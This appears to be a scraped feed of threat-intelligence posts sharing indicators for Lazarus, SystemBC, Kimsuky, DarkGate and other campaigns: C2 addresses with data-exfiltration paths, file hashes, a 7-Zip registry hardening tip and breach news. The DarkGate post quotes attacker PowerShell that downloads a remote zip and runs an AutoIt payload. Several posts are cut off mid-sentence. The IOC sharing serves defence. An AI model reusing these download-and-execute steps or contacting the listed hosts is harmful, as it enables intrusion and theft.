Wondering if the `15` refers to the implant (campaign) version? #Lazarus #IOC #GitHub

Additional URLs with its context:
172[.]86[.]98[.]240:1224/payload1/15
172[.]86[.]98[.]240:1224/brow/15 --> browsers data exfil
172[.]86[.]98[.]240:1224/keys --> encryption keys exfil

Fresh #Lazarus #GitHub campaign:
C2: 172[.]86[.]98[.]240:1224 🌐(VT detection == 0)
Implants ☣️: 172[.]86[.]98[.]240:1224/pdown , 172[.]86[.]98[.]240:1224/client/15

Hashes:
01611aa9fe649335a7d813fa1693b9421d8585155351f3a696e8bfdcf45440d3 *file.js

If you deploy 7-zip to your enterprise, did you know it doesn't propagate mark of the web (MOTW) streams to extracted files by default? You can configure it manually or via Windows Registry key:

[HKEY_CURRENT_USER\Software\7-Zip\Options]
'WriteZoneIdExtract'=dword:00000001

🚨 Recent 𝗔𝗰𝘁𝗶𝘃𝗲 #SystemBC #Malware spread from HETZNER-CLOUD2-AS, DE (AS213230), United States (USA).

C2 IP:
wprogs[.]top PORT:4001 / 5.161.81.32

Hash:
4ec075da7739a5e33496f1665a210425
Total Live Victims: (187) across various countries.👇
Stay vigilant! 🛡️ #threatintel

🚨 #IcedID , #Smokeloader , #SystemBC , #Pikabot and #Bumblebee botnets have been disrupted by Operation Endgame!! This is the largest operation EVER against botnets involved with ransomware, with gargantuan thanks to a coordinated effort led by international agencies👏👏

As with

Observed several LATAM banks (CL,AR,CO,BR) vulnerable to this!!! Also, IT providers!

#csirt #ir #checkpoint CVE-2024-24919

Germán Fernández

labs.watchtowr.com/check-point-wr…

🚩 'origami_updated2.zip': 99540e7420825558a30c38e09ab22ab2170c20b0d17e7890bafe26e32edcb418 ↓

▪ 'Origami.exe': e2d58cb5872b624b0c1b5dca06d8f312a9f080911e6ded86c35ff0761fd55628
Comms to:
1.- https://t[.]ly/B0L6y
2.-

🔴 Y llegó el día... ponen en venta la supuesta información robada al Banco/Grupo Santander.

Según el actor de amenaza, los registros incluyen (entre muchos otros):
▪ 30 millones de datos de clientes.
▪ 64 millones de datos de cuentas y saldos.
▪ 28 millones de tarjetas de

APT43/Kimsuky (Black Banshee)🇰🇵

/141.11.95.135
/67.217.60.68
/67.217.62.219
/185.141.171.31
/185.203.119.14

/note.iiiii.info
/share-defence.uberlingen.com
/imagedownload.ignorelist.com
/signin-ym.quest
/mnlp.quest
/oso-usps.com
/drives.youramys.com
/www.uidlogin.o-r.kr

Fuck Elon Musk.

I've been looking into a #Qakbot v5 sample and made a technical blog about it in detail ,Check it out ! .
zw01f.github.io/malware%20anal…

This is my first MA technical report and I would highly appreciate any feedback!

harfanglab.io/en/insidethela…

#AllaSenha #AllaKore

Germán Fernández Igal Lytzki🇮🇱

Debloat removes junk from inflated executables: github.com/Squiblydoo/deb…

In v1.5.5, I added result-codes: telling the user which tactic was used. This allows measuring success and what tactics are used.

From 700 files, Debloat worked 97.8% of the time.

#Darkgate - .ps1 > url > .zip > .exe

powershell.exe oxi.ps1

$vp = 'https://kostumn1.ilabserver.]com/1.zip'
$be = 'c:\downloads

invoke-webrequest -uri $vp -outfile $be
tu.zip

expand-archive

start-process autoit3.exe script.a3x

IOC's
github.com/pr0xylife/Dark…

'GoogleDrive_shared.zip': f6361262aa617cd71e6692089934f02273c2e763be148c3bf5eb2e4779a301f7
Inside maybe interesting 'Polis Asuransi ASRI.pdf.lnk': ec9d860c799d61487c2cf9af383144f8afb5db9d96ba30e210ecbd6a38c5fc1e
🤔
Germán Fernández Florian Roth